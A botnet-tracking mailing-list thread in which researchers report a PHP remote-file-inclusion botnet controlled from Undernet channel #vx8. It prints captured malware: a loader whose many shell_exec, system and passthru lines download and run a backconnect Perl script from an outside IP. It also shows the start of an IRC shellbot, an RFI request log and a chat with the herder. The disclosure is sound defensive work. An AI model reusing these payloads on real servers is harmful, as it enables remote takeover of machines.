Re: [botnets] Another botnet on eu.undernet.org

[James Pleger]

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

I also see: GET http://64.38.11.130/~marzoky/images/kgb.c which points to that channel. [11:12:50 bash] [~] [EMAIL PROTECTED] curl http://64.38.11.130/~marzoky/images/kgb.c | grep include   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                  Dload  Upload   Total   Spent    Left  Speed 100 22264  100 22264    0     0  41928      0 --:--:-- --:--:-- --:--:-- 75436 include 'http://64.38.11.130/~marzoky/images/teamrx'; include 'http://64.38.11.130/~marzoky/images/toyo.txt?'; [11:12:56 bash] [~] [EMAIL PROTECTED] curl http://64.38.11.130/~marzoky/images/teamrx <? // BYY xeQter shell_exec('cd /tmp; wget http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); shell_exec('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); shell_exec('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); shell_exec('cd /tmp;fetch http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); shell_exec('cd /tmp;GET http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); system('cd /tmp;wget http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); system('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); system('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); system('cd /tmp;fetch http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); system('cd /tmp;GET http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); passthru('cd /tmp;wget http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); passthru('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); passthru('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); passthru('cd /tmp;fetch http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf  bc.txt'); passthru('cd /tmp;GET http://64.38.11.130/~marzoky/images/bc.txt>bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); shell_exec('cd /tmp;wget http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130 ; rm -rf bc.txt'); shell_exec('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130'); shell_exec('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/bc.txt ; perl bc.txt 64.38.11.130'); shell_exec('cd /tmp;fetch http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt'); shell_exec('cd /tmp;GET http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt'); system('cd /tmp;wget http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*'); system('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*'); system('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*'); system('cd /tmp;fetch http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt ; rm -rf n.txt n.txt.*'); system('cd /tmp;GET http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt ; rm -rf n.txt n.txt.*'); passthru('cd /tmp;wget http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*'); passthru('cd /tmp;curl -O http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*'); passthru('cd /tmp;lwp-download http://64.38.11.130/~marzoky/images/n.txt ; perl n.txt ; rm -rf n.txt n.txt.*'); passthru('cd /tmp;fetch http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt ; rm -rf n.txt n.txt.*'); passthru('cd /tmp;GET http://64.38.11.130/~marzoky/images/n.txt>n.txt ; perl n.txt ; rm -rf n.txt n.txt.*'); shell_exec('cd /tmp;rm -rf bc.txt*'); system('cd /tmp;rm -rf bc.txt*'); passthru('cd /tmp;rm -rf bc.txt*'); ?> [11:13:09 bash] [~] [EMAIL PROTECTED] curl http://64.38.11.130/~marzoky/images/toyo.txt <?php error_reporting(0); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $safe = @ini_get('safe_mode'); $up = time(); $mn1 = php_uname(); $mn2 = PHP_OS; function randomkeys($length) {   $pattern = "abcdefghijklmnopqrstuvwxyz";   for($i=0;$i<$length;$i++)   {     $key .= $pattern{rand(0,35)};   }   return $key; } // BYY xeQter vS TeaMrx - Br0nx $ip = $_SERVER['REMOTE_ADDR']; $HTTP_HOST = getenv("HTTP_HOST"); $REQUEST_URI = getenv("REQUEST_URI"); $xeQted = "[x] $HTTP_HOST$REQUEST_URI"; if (@file_exists("/bin/sh")) $pro1="sh$: Yes"; else $pro1="sh$: NO"; if (@file_exists("/usr/bin/wget")) $pro2="WGET: yes"; else $pro2="WGET: NO"; if (@file_exists("/usr/bin/curl")) $pro3="CURL: yes"; else $pro3="CURL: NO"; if (@file_exists("/usr/bin/lynx")) $pro4="LYNX: yes" ; else $pro4="LYNX: NO"; if (@file_exists("/usr/bin/GET")) $pro5="GET: yes"; else $pro5="GET: No"; if ($safe) $xsafe="Safe_mode: ON"; if (!$safe) $xsafe="safe_mode: OFF"; else $xsafe="Safe_mode: Unknown"; [EMAIL PROTECTED](); [EMAIL PROTECTED](); [EMAIL PROTECTED](); $phpver = "PHP ".phpversion(); $vhost = "e8ea21c62fc9b75647054059b815d350"; $vhost2 = "7886906c819599697c97aa15d8e37f62"; $vhost3 = 'xeQt.users.undernet.org'; $identd = randomkeys(4).rand(100,999); $me = randomkeys(5).rand(100,999); $ircname = randomkeys(4).rand(100,999); $version = "TeaMrx v1.0"; $server = "eu.undernet.org"; $quitmsg = "xeQt vS TeaMrx"; $chan = "#vx8"; $port = '6667'; while(0==0) { $ircsock = @fsockopen($server, $port); James Pleger Go Daddy Software, Inc. [EMAIL PROTECTED] Desk: 480-505-8800 x4093 Cell: 480-262-7293 This email message and any attachments hereto is intended for use only by the addressee(s) named herein and may contain legally privileged and/or confidential information. If you have received this email in error, please immediately notify the sender and permanently delete the original and any copy of this message and its attachments. David Vorel wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- Hi all, nice shot Bodik ;] I found different botnet on eu.undernet.org chan #vx8 it's linux zombie based botnet spreads throught various bugs in PHP. Undernet admins please take look on it. Description follows. Botnet herders are Denzel, xeQt, aslpls-. First attempt: 85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 "-" "libwww-perl/5.79" We mirror all links included, engine for RFI source is not completed yet, so for this time I send row urls. http://nawader.org/modules/Top/kgb.c http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt - PHP shell which includes other links http://nawader.org/modules/Top/bc.txt http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt - Backconnect shell http://nawader.org/modules/Top/n.txt http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt - Shellbot I, connect to eu.undernet.org #vx8 http://nawader.org/modules/Top/teamrx http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt - Loader for n.txt and bc.txt run backconnect and send shell to 220.232.137.199 and 64.38.11.130 http://nawader.org/modules/Top/toyo.txt http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt - Shellbot II, connect to eu.undernet.org #vx8 All scripts are labelled "xeQt vS TeaMrx". Who on chan: http://www.honeynet.cz/trash/list After while on channel bot herders move bots to another chan. #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI #vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi. Here is list from uname -sr. http://www.honeynet.cz/trash/uname chat: <crop> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould u :[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal :[EMAIL PROTECTED] PRIVMSG #vx8 :make shit << PRIVMSG #vx8 :i now that you are criminal << PRIVMSG #vx8 :but still on free ? :[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free :[EMAIL PROTECTED] PRIVMSG #vx8 :$$ << PRIVMSG xeQt :^AVERSION^A :[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC v6.17 Khaled Mardam-Bey^A :[EMAIL PROTECTED] PRIVMSG #vx8 :its my life << PRIVMSG #vx8 :jail is for free :[EMAIL PROTECTED] PRIVMSG #vx8 :i know :[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon << PRIVMSG #vx8 :y are waiting for ? :[EMAIL PROTECTED] PRIVMSG #vx8 :its full :[EMAIL PROTECTED] PRIVMSG #vx8 :a few months :[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i goto wait </crop> <crop> :[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch any of the servers << PRIVMSG #vx8 :when u installed your script throught bug in php that's touching too :[EMAIL PROTECTED] PRIVMSG #vx8 ::))) :[EMAIL PROTECTED] PRIVMSG #vx8 :i tould you :[EMAIL PROTECTED] PRIVMSG #vx8 :its magic :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont connect to anything << PRIVMSG #vx8 :yes u did :[EMAIL PROTECTED] PRIVMSG #vx8 :no i didn't :[EMAIL PROTECTED] PRIVMSG #vx8 :all the bots do my job << PRIVMSG #vx8 :and that is ? :[EMAIL PROTECTED] PRIVMSG #vx8 :you know what mass spread is? << PRIVMSG #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI << PRIVMSG #vx8 :and what about this ? :[EMAIL PROTECTED] PRIVMSG #vx8 :so? :[EMAIL PROTECTED] PRIVMSG #vx8 :how you get this ip address from that? << PRIVMSG #vx8 :this command is better one.. << PRIVMSG #vx8 :<@xeQt> !x uname -sr :[EMAIL PROTECTED] PRIVMSG #vx8 :!x id :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33949(nucsaor) gid=33952(nucsaor) groups=33952(nucsaor) :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33(www-data) gid=33(www-data) groups=33(www-data) :[EMAIL PROTECTED] PRIVMSG #vx8 :like that? :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) gid=80(www) groups=80(www) :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) gid=80(www) groups=80(www) << PRIVMSG #vx8 :yes, now you are in direct connect with these servers .. :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont think you have no clue man << PRIVMSG #vx8 :thats the point of abuse .. << PRIVMSG #vx8 :these servers are yours ? << PRIVMSG #vx8 :or not ? :[EMAIL PROTECTED] PRIVMSG #vx8 :i understand your pissed off, but this is useless :[EMAIL PROTECTED] PRIVMSG #vx8 :call the cops, make them trace me... but its useless << PRIVMSG #vx8 :I think that all servers here are used to fraud .. << PRIVMSG #vx8 :i dont think so .. :[EMAIL PROTECTED] PRIVMSG #vx8 :!x unset HISTFILE HISTSAVE << PRIVMSG #vx8 :heh :[EMAIL PROTECTED] PRIVMSG #vx8 :o_0 :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont see how you get ip from that << PRIVMSG #vx8 :from what ? :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac? << PRIVMSG #vx8 :? :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac :[EMAIL PROTECTED] PRIVMSG #vx8 :man << PRIVMSG #vx8 :what ? :[EMAIL PROTECTED] PRIVMSG #vx8 :good luck hunting me :[EMAIL PROTECTED] PRIVMSG #vx8 :with feds :[EMAIL PROTECTED] PRIVMSG #vx8 :its useless :[EMAIL PROTECTED] PRIVMSG #vx8 :for sure :[EMAIL PROTECTED] PRIVMSG #vx8 :but do it.. i dont say no but.. goood luck << PRIVMSG #vx8 :i'm not hunting you, thats work for authorities. :[EMAIL PROTECTED] PRIVMSG #vx8 :yes :[EMAIL PROTECTED] PRIVMSG #vx8 :goood :[EMAIL PROTECTED] PRIVMSG #vx8 :i like a channelge :[EMAIL PROTECTED] PRIVMSG #vx8 :challenge << PRIVMSG #vx8 :so what for now ? :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont need to :[EMAIL PROTECTED] PRIVMSG #vx8 :why wold i do that? :[EMAIL PROTECTED] PRIVMSG #vx8 :im the bitch, you the victum.. << PRIVMSG #vx8 :i'm not victim .. :[EMAIL PROTECTED] PRIVMSG #vx8 :you hunt me << PRIVMSG #vx8 :others are victims .. :[EMAIL PROTECTED] PRIVMSG #vx8 :your right :[EMAIL PROTECTED] PRIVMSG #vx8 :you a cop? << PRIVMSG #vx8 :yes << PRIVMSG #vx8 :;] :[EMAIL PROTECTED] PRIVMSG #vx8 :and? :[EMAIL PROTECTED] NICK :CopKiller :[EMAIL PROTECTED] PRIVMSG #vx8 :what you gonna do about it? :[EMAIL PROTECTED] PRIVMSG #vx8 :call your friends, girlfriends.... :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont give a fuck :[EMAIL PROTECTED] PRIVMSG #vx8 :here i kick cops << PRIVMSG #vx8 :so kick me dude ;] :[EMAIL PROTECTED] PRIVMSG #vx8 :dont need to << PRIVMSG #vx8 :heh :[EMAIL PROTECTED] PRIVMSG #vx8 :come here and ill show you << PRIVMSG #vx8 :i'm here :[EMAIL PROTECTED] PRIVMSG #vx8 :in my hoood :[EMAIL PROTECTED] PRIVMSG #vx8 :not mirc </crop> Cheers.. David Vorel _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets